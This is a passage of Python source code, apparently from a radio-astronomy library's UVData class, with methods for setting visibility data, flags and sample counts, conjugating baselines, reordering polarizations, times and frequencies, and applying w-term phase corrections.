meters, shape=(Nants, 3)
ants : ndarray
Antenna numbers matching ordering of antpos, shape=(Nants,)
"""
antpos = uvutils.ENU_from_ECEF(
(self.antenna_positions + self.telescope_location),
*self.telescope_location_lat_lon_alt,
)
ants = self.antenna_numbers
if pick_data_ants:
data_ants = np.unique(np.concatenate([self.ant_1_array, self.ant_2_array]))
telescope_ants = self.antenna_numbers
select = np.in1d(telescope_ants, data_ants)
antpos = antpos[select, :]
ants = telescope_ants[select]
if center is True:
antpos -= np.median(antpos, axis=0)
return antpos, ants
def _set_method_helper(self, dshape, key1, key2=None, key3=None):
"""
Extract the indices for setting data, flags, or nsample arrays.
This is a helper method designed to work with set_data, set_flags, and
set_nsamples. Given the shape of the data-like array and the keys
corresponding to where the data should end up, it finds the indices
that are needed for the `_index_dset` method.
Parameters
----------
dshape : tuple of int
The shape of the data-like array. This is used to ensure the array
is compatible with the indices selected.
key1, key2, key3 : int or tuple of ints
Identifier of which flags to set, can be passed as 1, 2, or 3 arguments
or as a single tuple of length 1, 2, or 3. These are collectively
called the key.
If key is length 1:
if (key < 5) or (type(key) is str):
interpreted as a polarization number/name, set all flags for
that pol.
else:
interpreted as a baseline number, set all flags for that baseline.
if key is length 2: interpreted as an antenna pair, set all flags
for that baseline.
if key is length 3: interpreted as antenna pair and pol (ant1, ant2, pol),
set all flags for that baseline, pol. pol may be a string or int.
Returns
-------
inds : tuple of int
The indices in the data-like array to slice into.
Raises
------
ValueError:
If more than 3 keys are passed, if the requested indices are
conjugated in the data, if the data array shape is not compatible
with the indices.
"""
key = []
for val in [key1, key2, key3]:
if isinstance(val, str):
key.append(val)
elif val is not None:
key += list(uvutils._get_iterable(val))
if len(key) > 3:
raise ValueError("no more than 3 key values can be passed")
ind1, ind2, indp = self._key2inds(key)
if len(ind2) != 0:
raise ValueError(
"the requested key is present on the object, but conjugated. Please "
"conjugate data and keys appropriately and try again"
)
if self.future_array_shapes:
expected_shape = (len(ind1), self.Nfreqs, len(indp[0]))
else:
expected_shape = (len(ind1), 1, self.Nfreqs, len(indp[0]))
if dshape != expected_shape:
raise ValueError(
"the input array is not compatible with the shape of the destination. "
f"Input array shape is {dshape}, expected shape is {expected_shape}."
)
blt_slices, blt_sliceable = uvutils._convert_to_slices(
ind1, max_nslice_frac=0.1
)
pol_slices, pol_sliceable = uvutils._convert_to_slices(
indp[0], max_nslice_frac=0.5
)
if self.future_array_shapes:
inds = [ind1, np.s_[:], indp[0]]
else:
inds = [ind1, np.s_[:], np.s_[:], indp[0]]
if blt_sliceable:
inds[0] = blt_slices
if pol_sliceable:
inds[-1] = pol_slices
return tuple(inds)
def set_data(self, data, key1, key2=None, key3=None):
"""
Set the data array to some values provided by the user.
Parameters
----------
data : ndarray of complex
The data to overwrite into the data_array. Must be the same shape as
the target indices.
key1, key2, key3 : int or tuple of ints
Identifier of which data to set, can be passed as 1, 2, or 3 arguments
or as a single tuple of length 1, 2, or 3. These are collectively
called the key.
If key is length 1:
if (key < 5) or (type(key) is str):
interpreted as a polarization number/name, get all data for
that pol.
else:
interpreted as a baseline number, get all data for that baseline.
if key is length 2: interpreted as an antenna pair, get all data
for that baseline.
if key is length 3: interpreted as antenna pair and pol (ant1, ant2, pol),
get all data for that baseline, pol. pol may be a string or int.
Returns
-------
None
Raises
------
ValueError:
If more than 3 keys are passed, if the requested indices are
conjugated in the data, if the data array shape is not compatible
with the indices.
"""
dshape = data.shape
inds = self._set_method_helper(dshape, key1, key2, key3)
uvutils._index_dset(self.data_array, inds, data)
return
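# A minimal usage sketch (illustrative only; assumes `uvd` is a populated
# UVData object containing baseline (1, 2) with pol "xx", unconjugated):
#
#     vis = np.copy(uvd.get_data(1, 2, "xx", squeeze="none"))
#     vis *= 2.0                     # some modification of the visibilities
#     uvd.set_data(vis, 1, 2, "xx")  # write the modified values back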
def set_flags(self, flags, key1, key2=None, key3=None):
"""
Set the flag array to some values provided by the user.
Parameters
----------
flags : ndarray of boolean
The flags to overwrite into the flag_array. Must be the same shape
as the target indices.
key1, key2, key3 : int or tuple of ints
Identifier of which flags to set, can be passed as 1, 2, or 3 arguments
or as a single tuple of length 1, 2, or 3. These are collectively
called the key.
If key is length 1:
if (key < 5) or (type(key) is str):
interpreted as a polarization number/name, set all flags for
that pol.
else:
interpreted as a baseline number, set all flags for that baseline.
if key is length 2: interpreted as an antenna pair, set all flags
for that baseline.
if key is length 3: interpreted as antenna pair and pol (ant1, ant2, pol),
set all flags for that baseline, pol. pol may be a string or int.
Returns
-------
None
Raises
------
ValueError:
If more than 3 keys are passed, if the requested indices are
conjugated in the data, if the data array shape is not compatible
with the indices.
"""
dshape = flags.shape
inds = self._set_method_helper(dshape, key1, key2, key3)
uvutils._index_dset(self.flag_array, inds, flags)
return
def set_nsamples(self, nsamples, key1, key2=None, key3=None):
"""
Set the nsamples array to some values provided by the user.
Parameters
----------
nsamples : ndarray of float
The nsamples to overwrite into the nsample_array. Must be the same
shape as the target indices.
key1, key2, key3 : int or tuple of ints
Identifier of which nsamples to set, can be passed as 1, 2, or 3
arguments or as a single tuple of length 1, 2, or 3. These are
collectively called the key.
If key is length 1:
if (key < 5) or (type(key) is str):
interpreted as a polarization number/name, set all nsamples for
that pol.
else:
interpreted as a baseline number, set all nsamples for that
baseline.
if key is length 2: interpreted as an antenna pair, set all nsamples
for that baseline.
if key is length 3: interpreted as antenna pair and pol (ant1, ant2,
pol), set all nsamples for that baseline, pol. pol may be a
string or int.
Returns
-------
None
Raises
------
ValueError:
If more than 3 keys are passed, if the requested indices are
conjugated in the data, if the data array shape is not compatible
with the indices.
"""
dshape = nsamples.shape
inds = self._set_method_helper(dshape, key1, key2, key3)
uvutils._index_dset(self.nsample_array, inds, nsamples)
return
def antpairpol_iter(self, squeeze="default"):
"""
Iterate the data for each antpair, polarization combination.
Parameters
----------
squeeze : str
string specifying how to squeeze the returned array. Options are:
'default': squeeze pol and spw dimensions if possible;
'none': no squeezing of resulting numpy array;
'full': squeeze all length 1 dimensions.
Yields
------
key : tuple
antenna1, antenna2, and polarization string
data : ndarray of complex
data for the ant pair and polarization specified in key
"""
antpairpols = self.get_antpairpols()
for key in antpairpols:
yield (key, self.get_data(key, squeeze=squeeze))
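# A minimal usage sketch (illustrative only; assumes `uvd` is a populated
# UVData object):
#
#     for (ant1, ant2, pol), vis in uvd.antpairpol_iter():
#         print(ant1, ant2, pol, vis.shape)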
def conjugate_bls(self, convention="ant1<ant2", use_enu=True, uvw_tol=0.0):
"""
Conjugate baselines according to one of the supported conventions.
This will fail if only one of the cross pols is present (because
conjugation requires changing the polarization number for cross pols).
Parameters
----------
convention : str or array_like of int
A convention for the directions of the baselines, options are:
'ant1<ant2', 'ant2<ant1', 'u<0', 'u>0', 'v<0', 'v>0' or an
index array of blt indices to conjugate.
use_enu : bool
Use true antenna positions to determine uv location (as opposed to
uvw array). Only applies if `convention` is 'u<0', 'u>0', 'v<0', 'v>0'.
Set to False to use uvw array values.
uvw_tol : float
Defines a tolerance on uvw coordinates for setting the
u>0, u<0, v>0, or v<0 conventions. Defaults to 0m.
Raises
------
ValueError
If convention is not an allowed value or if not all conjugate pols exist.
"""
if isinstance(convention, (np.ndarray, list, tuple)):
convention = np.array(convention)
if (
np.max(convention) >= self.Nblts
or np.min(convention) < 0
or convention.dtype not in [int, np.int_, np.int32, np.int64]
):
raise ValueError(
"If convention is an index array, it must "
"contain integers and have values greater "
"than zero and less than NBlts"
)
else:
if convention not in ["ant1<ant2", "ant2<ant1", "u<0", "u>0", "v<0", "v>0"]:
raise ValueError(
"convention must be one of 'ant1<ant2', "
"'ant2<ant1', 'u<0', 'u>0', 'v<0', 'v>0' or "
"an index array with values less than NBlts"
)
if isinstance(convention, str):
if convention in ["u<0", "u>0", "v<0", "v>0"]:
if use_enu is True:
enu, anum = self.get_ENU_antpos()
anum = anum.tolist()
uvw_array_use = np.zeros_like(self.uvw_array)
for i, bl in enumerate(self.baseline_array):
a1, a2 = self.ant_1_array[i], self.ant_2_array[i]
i1, i2 = anum.index(a1), anum.index(a2)
uvw_array_use[i, :] = enu[i2] - enu[i1]
else:
uvw_array_use = copy.copy(self.uvw_array)
if convention == "ant1<ant2":
index_array = np.asarray(self.ant_1_array > self.ant_2_array).nonzero()
elif convention == "ant2<ant1":
index_array = np.asarray(self.ant_2_array > self.ant_1_array).nonzero()
elif convention == "u<0":
index_array = np.asarray(
(uvw_array_use[:, 0] > uvw_tol)
| (uvw_array_use[:, 1] > uvw_tol)
& np.isclose(uvw_array_use[:, 0], 0, atol=uvw_tol)
| (uvw_array_use[:, 2] > uvw_tol)
& np.isclose(uvw_array_use[:, 0], 0, atol=uvw_tol)
& np.isclose(uvw_array_use[:, 1], 0, atol=uvw_tol)
).nonzero()
elif convention == "u>0":
index_array = np.asarray(
(uvw_array_use[:, 0] < -uvw_tol)
| (
(uvw_array_use[:, 1] < -uvw_tol)
& np.isclose(uvw_array_use[:, 0], 0, atol=uvw_tol)
)
| (
(uvw_array_use[:, 2] < -uvw_tol)
& np.isclose(uvw_array_use[:, 0], 0, atol=uvw_tol)
& np.isclose(uvw_array_use[:, 1], 0, atol=uvw_tol)
)
).nonzero()
elif convention == "v<0":
index_array = np.asarray(
(uvw_array_use[:, 1] > uvw_tol)
| (uvw_array_use[:, 0] > uvw_tol)
& np.isclose(uvw_array_use[:, 1], 0, atol=uvw_tol)
| (uvw_array_use[:, 2] > uvw_tol)
& np.isclose(uvw_array_use[:, 0], 0, atol=uvw_tol)
& np.isclose(uvw_array_use[:, 1], 0, atol=uvw_tol)
).nonzero()
elif convention == "v>0":
index_array = np.asarray(
(uvw_array_use[:, 1] < -uvw_tol)
| (uvw_array_use[:, 0] < -uvw_tol)
& np.isclose(uvw_array_use[:, 1], 0, atol=uvw_tol)
| (uvw_array_use[:, 2] < -uvw_tol)
& np.isclose(uvw_array_use[:, 0], 0, atol=uvw_tol)
& np.isclose(uvw_array_use[:, 1], 0, atol=uvw_tol)
).nonzero()
else:
index_array = convention
if index_array[0].size > 0:
new_pol_inds = uvutils.reorder_conj_pols(self.polarization_array)
self.uvw_array[index_array] *= -1
if not self.metadata_only:
orig_data_array = copy.copy(self.data_array)
for pol_ind in np.arange(self.Npols):
if self.future_array_shapes:
self.data_array[
index_array, :, new_pol_inds[pol_ind]
] = np.conj(orig_data_array[index_array, :, pol_ind])
else:
self.data_array[
index_array, :, :, new_pol_inds[pol_ind]
] = np.conj(orig_data_array[index_array, :, :, pol_ind])
ant_1_vals = self.ant_1_array[index_array]
ant_2_vals = self.ant_2_array[index_array]
self.ant_1_array[index_array] = ant_2_vals
self.ant_2_array[index_array] = ant_1_vals
self.baseline_array[index_array] = self.antnums_to_baseline(
self.ant_1_array[index_array], self.ant_2_array[index_array]
)
self.Nbls = np.unique(self.baseline_array).size
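# A minimal usage sketch (illustrative only; assumes `uvd` is a populated
# UVData object with both cross pols present):
#
#     uvd.conjugate_bls(convention="ant1<ant2")           # enforce ant1 < ant2
#     uvd.conjugate_bls(convention="u>0", uvw_tol=0.01)   # positive-u half plane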
def reorder_pols(
self,
order="AIPS",
run_check=True,
check_extra=True,
run_check_acceptability=True,
strict_uvw_antpos_check=False,
):
"""
Rearrange polarizations in the event they are not uvfits compatible.
Parameters
----------
order : str
Either a string specifying a canonical ordering ('AIPS' or 'CASA')
or an index array of length Npols that specifies how to shuffle the
data (this is not the desired final pol order).
CASA ordering has cross-pols in between (e.g. XX,XY,YX,YY);
AIPS ordering has auto-pols followed by cross-pols (e.g. XX,YY,XY,YX).
The default ('AIPS') will sort by the absolute value of the pol values.
run_check : bool
Option to check for the existence and proper shapes of parameters
after reordering.
check_extra : bool
Option to check optional parameters as well as required ones.
run_check_acceptability : bool
Option to check acceptable range of the values of parameters after
reordering.
strict_uvw_antpos_check : bool
Option to raise an error rather than a warning if the check that
uvws match antenna positions does not pass.
Raises
------
ValueError
If the order is not one of the allowed values.
"""
if isinstance(order, (np.ndarray, list, tuple)):
order = np.array(order)
if (
order.size != self.Npols
or order.dtype not in [int, np.int_, np.int32, np.int64]
or np.min(order) < 0
or np.max(order) >= self.Npols
):
raise ValueError(
"If order is an index array, it must "
"contain integers and be length Npols."
)
index_array = order
elif order == "AIPS":
index_array = np.argsort(np.abs(self.polarization_array))
elif order == "CASA":
casa_order = np.array([1, 2, 3, 4, -1, -3, -4, -2, -5, -7, -8, -6])
pol_inds = []
for pol in self.polarization_array:
pol_inds.append(np.where(casa_order == pol)[0][0])
index_array = np.argsort(pol_inds)
else:
raise ValueError(
"order must be one of: 'AIPS', 'CASA', or an "
"index array of length Npols"
)
self.polarization_array = self.polarization_array[index_array]
if not self.metadata_only:
# data array is special and large, take is faster here
if self.future_array_shapes:
self.data_array = np.take(self.data_array, index_array, axis=2)
self.nsample_array = self.nsample_array[:, :, index_array]
self.flag_array = self.flag_array[:, :, index_array]
else:
self.data_array = np.take(self.data_array, index_array, axis=3)
self.nsample_array = self.nsample_array[:, :, :, index_array]
self.flag_array = self.flag_array[:, :, :, index_array]
# check if object is self-consistent
if run_check:
self.check(
check_extra=check_extra,
run_check_acceptability=run_check_acceptability,
strict_uvw_antpos_check=strict_uvw_antpos_check,
)
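# A minimal usage sketch (illustrative only; assumes `uvd` is a populated
# UVData object; the explicit index array below assumes Npols == 4):
#
#     uvd.reorder_pols(order="CASA")                          # canonical CASA order
#     uvd.reorder_pols(order=[1, 0, 3, 2], run_check=False)   # explicit shuffle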
def reorder_blts(
self,
order="time",
minor_order=None,
conj_convention=None,
uvw_tol=0.0,
conj_convention_use_enu=True,
run_check=True,
check_extra=True,
run_check_acceptability=True,
strict_uvw_antpos_check=False,
):
"""
Arrange blt axis according to desired order.
Optionally conjugate some baselines.
Parameters
----------
order : str or array_like of int
A string describing the desired order along the blt axis.
Options are: `time`, `baseline`, `ant1`, `ant2`, `bda` or an
index array of length Nblts that specifies the new order.
minor_order : str
Optionally specify a secondary ordering. Default depends on how
order is set: if order is 'time', this defaults to `baseline`,
if order is `ant1`, or `ant2` this defaults to the other antenna,
if order is `baseline` the only allowed value is `time`. Ignored if
order is `bda`. If this is the same as order, it is reset to the default.
conj_convention : str or array_like of int
Optionally conjugate baselines to make the baselines have the
desired orientation. See conjugate_bls for allowed values and details.
uvw_tol : float
If conjugating baselines, sets a tolerance for determining the signs
of u,v, and w, and whether or not they are zero.
See conjugate_bls for details.
conj_convention_use_enu: bool
If `conj_convention` is set, this is passed to conjugate_bls, see that
method for details.
run_check : bool
Option to check for the existence and proper shapes of parameters
after reordering.
check_extra : bool
Option to check optional parameters as well as required ones.
run_check_acceptability : bool
Option to check acceptable range of the values of parameters after
reordering.
strict_uvw_antpos_check : bool
Option to raise an error rather than a warning if the check that
uvws match antenna positions does not pass.
Raises
------
ValueError
If parameter values are inappropriate
"""
if isinstance(order, (np.ndarray, list, tuple)):
order = np.array(order)
if order.size != self.Nblts or order.dtype not in [
int,
np.int_,
np.int32,
np.int64,
]:
raise ValueError(
"If order is an index array, it must "
"contain integers and be length Nblts."
)
if minor_order is not None:
raise ValueError(
"Minor order cannot be set if order is an index array."
)
else:
if order not in ["time", "baseline", "ant1", "ant2", "bda"]:
raise ValueError(
"order must be one of 'time', 'baseline', "
"'ant1', 'ant2', 'bda' or an index array of "
"length Nblts"
)
if minor_order == order:
minor_order = None
if minor_order is not None:
if minor_order not in ["time", "baseline", "ant1", "ant2"]:
raise ValueError(
"minor_order can only be one of 'time', "
"'baseline', 'ant1', 'ant2'"
)
if isinstance(order, np.ndarray) or order == "bda":
raise ValueError(
"minor_order cannot be specified if order is "
"'bda' or an index array."
)
if order == "baseline":
if minor_order in ["ant1", "ant2"]:
raise ValueError("minor_order conflicts with order")
else:
if order == "time":
minor_order = "baseline"
elif order == "ant1":
minor_order = "ant2"
elif order == "ant2":
minor_order = "ant1"
elif order == "baseline":
minor_order = "time"
if conj_convention is not None:
self.conjugate_bls(
convention=conj_convention,
use_enu=conj_convention_use_enu,
uvw_tol=uvw_tol,
)
if isinstance(order, str):
if minor_order is None:
self.blt_order = (order,)
self._blt_order.form = (1,)
else:
self.blt_order = (order, minor_order)
# set it back to the right shape in case it was set differently before
self._blt_order.form = (2,)
else:
self.blt_order = None
if not isinstance(order, np.ndarray):
# Use lexsort to sort along different arrays in defined order.
if order == "time":
arr1 = self.time_array
if minor_order == "ant1":
arr2 = self.ant_1_array
arr3 = self.ant_2_array
elif minor_order == "ant2":
arr2 = self.ant_2_array
arr3 = self.ant_1_array
else:
# minor_order is baseline
arr2 = self.baseline_array
arr3 = self.baseline_array
elif order == "ant1":
arr1 = self.ant_1_array
if minor_order == "time":
arr2 = self.time_array
arr3 = self.ant_2_array
elif minor_order == "ant2":
arr2 = self.ant_2_array
arr3 = self.time_array
else: # minor_order is baseline
arr2 = self.baseline_array
arr3 = self.time_array
elif order == "ant2":
arr1 = self.ant_2_array
if minor_order == "time":
arr2 = self.time_array
arr3 = self.ant_1_array
elif minor_order == "ant1":
arr2 = self.ant_1_array
arr3 = self.time_array
else:
# minor_order is baseline
arr2 = self.baseline_array
arr3 = self.time_array
elif order == "baseline":
arr1 = self.baseline_array
# only allowed minor order is time
arr2 = self.time_array
arr3 = self.time_array
elif order == "bda":
arr1 = self.integration_time
# only allowed minor order is time
arr2 = self.baseline_array
arr3 = self.time_array
# lexsort uses the listed arrays from last to first
# (so the primary sort is on the last one)
index_array = np.lexsort((arr3, arr2, arr1))
else:
index_array = order
# actually do the reordering
self.ant_1_array = self.ant_1_array[index_array]
self.ant_2_array = self.ant_2_array[index_array]
self.baseline_array = self.baseline_array[index_array]
self.uvw_array = self.uvw_array[index_array, :]
self.time_array = self.time_array[index_array]
self.lst_array = self.lst_array[index_array]
self.integration_time = self.integration_time[index_array]
if self.phase_center_app_ra is not None:
self.phase_center_app_ra = self.phase_center_app_ra[index_array]
if self.phase_center_app_dec is not None:
self.phase_center_app_dec = self.phase_center_app_dec[index_array]
if self.phase_center_frame_pa is not None:
self.phase_center_frame_pa = self.phase_center_frame_pa[index_array]
if self.multi_phase_center:
self.phase_center_id_array = self.phase_center_id_array[index_array]
if not self.metadata_only:
self.data_array = self.data_array[index_array]
self.flag_array = self.flag_array[index_array]
self.nsample_array = self.nsample_array[index_array]
# check if object is self-consistent
if run_check:
self.check(
check_extra=check_extra,
run_check_acceptability=run_check_acceptability,
strict_uvw_antpos_check=strict_uvw_antpos_check,
)
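# A minimal usage sketch (illustrative only; assumes `uvd` is a populated
# UVData object):
#
#     uvd.reorder_blts(order="time", minor_order="baseline",
#                      conj_convention="ant1<ant2")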
def reorder_freqs(
self,
spw_order=None,
channel_order=None,
select_spw=None,
run_check=True,
check_extra=True,
run_check_acceptability=True,
strict_uvw_antpos_check=False,
):
"""
Arrange frequency axis according to desired order.
Can be applied across the entire frequency axis, or just a subset.
Parameters
----------
spw_order : str or array_like of int
A string describing the desired order of spectral windows along the
frequency axis. Allowed strings include `number` (sort on spectral window
number) and `freq` (sort on median frequency). A '-' can be appended
to signify descending order instead of the default ascending order,
e.g., if you have SPW #1 and 2, and wanted them ordered as [2, 1],
you would specify `-number`. Alternatively, one can supply an array
of length Nspws that specifies the new order, with values matched to
the spectral window number given in `spw_array`. Default is to apply no
sorting of spectral windows.
channel_order : str or array_like of int
A string describing the desired order of frequency channels within a
spectral window. Allowed strings include `freq`, which will sort channels
within a spectral window by frequency. A '-' can be optionally appended
to signify descending order instead of the default ascending order.
Alternatively, one can supply an index array of length Nfreqs that
specifies the new order. Default is to apply no sorting of channels
within a single spectral window. Note that providing an array_like of ints
will cause the values given to `spw_order` and `select_spw` to be ignored.
select_spw : int or array_like of int
An int or array_like of ints which specifies which spectral windows to
apply sorting. Note that setting this argument will cause the value
given to `spw_order` to be ignored.
run_check : bool
Option to check for the existence and proper shapes of parameters
after reordering.
check_extra : bool
Option to check optional parameters as well as required ones.
run_check_acceptability : bool
Option to check acceptable range of the values of parameters after
reordering.
strict_uvw_antpos_check : bool
Option to raise an error rather than a warning if the check that
uvws match antenna positions does not pass.
Returns
-------
None
Raises
------
UserWarning
Raised if arguments are provided that end up being ignored (e.g.,
supplying spw_order together with select_spw, or supplying either of
them alongside an index array for channel_order).
ValueError
Raised if spw_order or channel_order are index arrays that do not
contain all of the required values, or strings that are not among the
allowed options.
"""
if (spw_order is None) and (channel_order is None):
warnings.warn(
"Not specifying either spw_order or channel_order causes "
"no sorting actions to be applied. Returning object unchanged."
)
return
# Check to see if there are arguments we should be ignoring
if isinstance(channel_order, (np.ndarray, list, tuple)):
if select_spw is not None:
warnings.warn(
"The select_spw argument is ignored when providing an "
"array_like of int for channel_order"
)
if spw_order is not None:
warnings.warn(
"The spw_order argument is ignored when providing an "
"array_like of int for channel_order"
)
if not np.all(np.sort(channel_order) == np.arange(self.Nfreqs)):
raise ValueError(
"Index array for channel_order must contain all indicies for "
"the frequency axis, without duplicates."
)
index_array = channel_order
else:
index_array = np.arange(self.Nfreqs)
# Multiply by 1.0 here to make a cheap copy of the array to manipulate
temp_freqs = 1.0 * (
self.freq_array if self.future_array_shapes else self.freq_array[0, :]
)
# Same trick for ints -- add 0 to make a cheap copy
temp_spws = 0 + (
self.flex_spw_id_array
if self.flex_spw
else (np.zeros(self.Nfreqs) + self.spw_array)
)
# Check whether or not we need to sort the channels in individual windows
sort_spw = {idx: channel_order is not None for idx in self.spw_array}
if select_spw is not None:
if spw_order is not None:
warnings.warn(
"The spw_order argument is ignored when providing an "
"argument for select_spw"
)
if channel_order is None:
warnings.warn(
"Specifying select_spw without providing channel_order causes "
"no sorting actions to be applied. Returning object unchanged."
)
return
if isinstance(select_spw, (np.ndarray, list, tuple)):
sort_spw = {idx: idx in select_spw for idx in self.spw_array}
else:
sort_spw = {idx: idx == select_spw for idx in self.spw_array}
elif spw_order is not None:
if isinstance(spw_order, (np.ndarray, list, tuple)):
if not np.all(np.sort(spw_order) == np.sort(self.spw_array)):
raise ValueError(
"Index array for spw_order must contain all values in "
"spw_array, without duplicates."
)
elif spw_order not in ["number", "freq", "-number", "-freq", None]:
raise ValueError(
"spw_order can only be one of 'number', '-number', "
"'freq', '-freq', or None"
)
elif self.Nspws > 1:
# Only need to do this step if we actually have multiple spws.
# If the string starts with a '-', then we will flip the order at
# the end of the operation
flip_spws = spw_order[0] == "-"
if "number" in spw_order:
spw_order = np.sort(self.spw_array)
elif "freq" in spw_order:
spw_order = self.spw_array[
np.argsort(
[
np.median(temp_freqs[temp_spws == idx])
for idx in self.spw_array
]
)
]
if flip_spws:
spw_order = np.flip(spw_order)
# Now that we know the spw order, we can apply the first sort
index_array = np.concatenate(
[index_array[temp_spws == idx] for idx in spw_order]
)
temp_freqs = temp_freqs[index_array]
temp_spws = temp_spws[index_array]
# Spectral windows are assumed sorted at this point
if channel_order is not None:
if channel_order not in ["freq", "-freq"]:
raise ValueError(
"channel_order can only be one of 'freq' or '-freq'"
)
for idx in self.spw_array:
if sort_spw[idx]:
select_mask = temp_spws == idx
subsort_order = index_array[select_mask]
subsort_order = subsort_order[
np.argsort(temp_freqs[select_mask])
]
index_array[select_mask] = (
np.flip(subsort_order)
if channel_order[0] == "-"
else subsort_order
)
if np.all(index_array[1:] > index_array[:-1]):
# Nothing to do - the data are already sorted!
return
# Now update all of the arrays.
if self.future_array_shapes:
self.freq_array = self.freq_array[index_array]
if not self.metadata_only:
self.data_array = self.data_array[:, index_array, :]
self.flag_array = self.flag_array[:, index_array, :]
self.nsample_array = self.nsample_array[:, index_array, :]
else:
self.freq_array = self.freq_array[:, index_array]
if not self.metadata_only:
self.data_array = self.data_array[:, :, index_array, :]
self.flag_array = self.flag_array[:, :, index_array, :]
self.nsample_array = self.nsample_array[:, :, index_array, :]
if self.flex_spw:
self.flex_spw_id_array = self.flex_spw_id_array[index_array]
self.channel_width = self.channel_width[index_array]
# Reorder the spw-axis items based on their first appearance in the data
unique_index = np.sort(
np.unique(self.flex_spw_id_array, return_index=True)[1]
)
self.spw_array = self.flex_spw_id_array[unique_index]
if self.eq_coeffs is not None:
self.eq_coeffs = self.eq_coeffs[:, index_array]
# check if object is self-consistent
if run_check:
self.check(
check_extra=check_extra,
run_check_acceptability=run_check_acceptability,
strict_uvw_antpos_check=strict_uvw_antpos_check,
)
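# A minimal usage sketch (illustrative only; assumes `uvd` is a populated
# UVData object with multiple spectral windows, here numbered 1 and 2):
#
#     uvd.reorder_freqs(spw_order="freq", channel_order="freq")
#     uvd.reorder_freqs(channel_order="-freq", select_spw=[1, 2])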
def remove_eq_coeffs(self):
"""
Remove equalization coefficients from the data.
Some telescopes, e.g. HERA, apply per-antenna, per-frequency gain
coefficients as part of the signal chain. These are stored in the
`eq_coeffs` attribute of the object. This method will remove them, so
that the data are in "unnormalized" raw units.
Parameters
----------
None
Returns
-------
None
Raises
------
ValueError
Raised if eq_coeffs or eq_coeffs_convention are not defined on the
object, or if eq_coeffs_convention is not one of "multiply" or "divide".
"""
if self.eq_coeffs is None:
raise ValueError(
"The eq_coeffs attribute must be defined on the object to apply them."
)
if self.eq_coeffs_convention is None:
raise ValueError(
"The eq_coeffs_convention attribute must be defined on the object "
"to apply them."
)
if self.eq_coeffs_convention not in ("multiply", "divide"):
raise ValueError(
"Got unknown convention {}. Must be one of: "
'"multiply", "divide"'.format(self.eq_coeffs_convention)
)
# apply coefficients for each baseline
for key in self.get_antpairs():
# get indices for this key
blt_inds = self.antpair2ind(key)
ant1_index = np.asarray(self.antenna_numbers == key[0]).nonzero()[0][0]
ant2_index = np.asarray(self.antenna_numbers == key[1]).nonzero()[0][0]
eq_coeff1 = self.eq_coeffs[ant1_index, :]
eq_coeff2 = self.eq_coeffs[ant2_index, :]
# make sure coefficients are the right size to broadcast
eq_coeff1 = np.repeat(eq_coeff1[:, np.newaxis], self.Npols, axis=1)
eq_coeff2 = np.repeat(eq_coeff2[:, np.newaxis], self.Npols, axis=1)
if self.eq_coeffs_convention == "multiply":
self.data_array[blt_inds] *= eq_coeff1 * eq_coeff2
else:
self.data_array[blt_inds] /= eq_coeff1 * eq_coeff2
return
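# Sketch of the correction applied per baseline (i, j) above, assuming the
# "divide" convention: data_ij(freq, pol) -> data_ij / (g_i(freq) * g_j(freq)),
# where g_i is the eq_coeffs row for antenna i. With the "multiply" convention
# the product g_i * g_j multiplies the data instead.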
def _apply_w_proj(self, new_w_vals, old_w_vals, select_mask=None):
"""
Apply corrections based on changes to w-coord.
Adjusts the data to account for a change along the w-axis of a baseline.
Parameters
----------
new_w_vals: float or ndarray of float
New w-coordinates for the baselines, in units of meters. Can either be a
solitary float (helpful for unphasing data, where new_w_vals can be set to
0.0) or an array of shape (Nselect,) (which is Nblts if select_mask=None).
old_w_vals: float or ndarray of float
Old w-coordinates for the baselines, in units of meters. Can either be a
solitary float or an array of shape (Nselect,) (which is Nblts if
select_mask=None).
select_mask: ndarray of bool
Array is of shape (Nblts,), where the sum of all entries marked True is
equal to Nselect (mentioned above).
Raises
------
IndexError
If the length of new_w_vals or old_w_vals isn't compatible with
select_mask, or if select mask isn't the right length.
"""
# If we only have metadata, then we have no work to do. W00t!
if self.metadata_only or (self.data_array is None):
return
if select_mask is None:
select_len = self.Nblts
else:
try:
inv_mask = np.ones(self.Nblts, dtype=bool)
inv_mask[select_mask] = False
select_mask = ~inv_mask
select_len = np.sum(select_mask)
except IndexError:
raise IndexError(
"select_mask must be an array-like, either of ints with shape "
"(Nblts), or of ints within the range (-Nblts, Nblts)."
)
# Promote everything to float64 ndarrays if they aren't already
old_w_vals = np.array(old_w_vals, dtype=np.float64)
old_w_vals.shape += (1,) if (old_w_vals.ndim == 0) else ()
new_w_vals = np.array(new_w_vals, dtype=np.float64)
new_w_vals.shape += (1,) if (new_w_vals.ndim == 0) else ()
# Make sure the lengths of everything make sense
new_val_len = len(new_w_vals)
old_val_len = len(old_w_vals)
if new_val_len not in [1, select_len]:
raise IndexError(
"The length of new_w_vals is wrong (expected 1 or %i, got %i)!"
% (select_len, new_val_len)
)
if old_val_len not in [1, select_len]:
raise IndexError(
"The length of old_w_vals is wrong (expected 1 or %i, got %i)!"
% (select_len, old_val_len)
)
# Calculate the difference in w terms as a function of freq. Note that the
# 1/c is there to speed up processing (faster to multiply than divide)
delta_w_lambda = (
(new_w_vals - old_w_vals).reshape(-1, 1)
* (1.0 / const.c.to("m/s").value)
* self.freq_array.reshape(1, self.Nfreqs)
)
if select_mask is None or np.all(select_mask):
# If all the w values are changing, it turns out to be twice as fast
# to ditch any sort of selection mask and just do the full multiply.
if self.future_array_shapes:
self.data_array *= np.exp(
(-1j * 2 * np.pi) * delta_w_lambda[:, :, None]
)
else:
self.data_array *= np.exp(
(-1j * 2 * np.pi) * delta_w_lambda[:, None, :, None]
)
elif np.any(select_mask):
# In the case we are _not_ doing all baselines, use a selection mask to
# only update the values we need. In the worst case, it slows down the
# processing by ~2x, but it can save a lot on time and memory if only
# needing to update a select number of baselines.
if self.future_array_shapes:
self.data_array[select_mask] *= np.exp(
(-1j * 2 * np.pi) * delta_w_lambda[:, :, None]
)
else:
self.data_array[select_mask] *= np.exp(
(-1j * 2 * np.pi) * delta_w_lambda[:, None, :, None]
)
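# The correction applied above is the standard w-term phasor: for each
# baseline and frequency nu, the visibility is multiplied by
# exp(-2j * pi * (w_new - w_old) * nu / c), with the w values in meters and
# c the speed of light (which is why 1/c is folded into delta_w_lambda).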
def unphase_to_drift(
self, phase_frame=None, use_ant_pos=True, use_old_proj=False,
):
"""
Convert from a phased dataset to a drift dataset.
See the phasing memo under docs/references for more documentation.
Parameters
----------
phase_frame : str
The astropy frame to phase from. Either 'icrs' or 'gcrs'.
'gcrs' accounts for precession & nutation, 'icrs' also includes aberration.
Defaults to using the 'phase_center_frame' attribute or 'icrs'
if that attribute is None.
use_ant_pos : bool
